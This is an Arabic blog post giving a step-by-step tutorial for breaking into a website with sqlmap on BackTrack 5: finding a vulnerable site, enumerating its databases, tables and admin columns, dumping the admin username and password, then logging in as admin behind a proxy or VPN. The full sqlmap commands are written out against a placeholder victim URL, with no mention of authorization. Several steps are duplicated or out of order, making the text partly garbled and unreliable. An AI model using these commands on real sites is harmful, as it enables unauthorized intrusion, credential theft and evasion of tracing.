facennok
السلام عليكم ورحمة الله وبركاته
1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !
اليوم سنقوم بشرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التلقائي الذي يساعدك على الإختراق الموقع بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5
1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !
2. الآن العثور على موقع مصاب. (وأيضا لدي موقع مصاب)
3. الآن اكتب هذا الأمر واضغط على enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs
حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
4. الآن سوف تحصل على اسم قاعدة البيانات للموقع !
حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.
5. الآن الحصول على جداول قاعدة البيانات. لذلك تحتاج إلى إدخال هذا الأمر وإضغط enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables
6. الآن نحن بحاجة للاستيلاء على الجداول من قاعدة البيانات AJ. لصق هذا الأمر أدناه وإضغط enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
7. الآن سوف تحصل على قائمة الجداول التي يتم تخزينها في قاعدة البيانات AJ
8. الآن أصبح بإمكانك الاستيلاء على أعمدة من الجدول الإدارة
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
الآن حصلنا على الأعمدة وحصلنا على اسم المستخدم وكلمة المرور9. الآن يتيح الاستيلاء على كلمات السر من admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
الآن حصلنا على اسم المستخدم وكلمة المرور للموقع!
الآن بمجرد العثور على معلومات الإدارة للموقع واستخدام بروكسي/ VPN وسيثم الدخول في الموقع باعتبارك admin.
المشاركات
0 التعليقات:
إضغط هنا لإضافة تعليق
إرسال تعليق
Blogger Widgets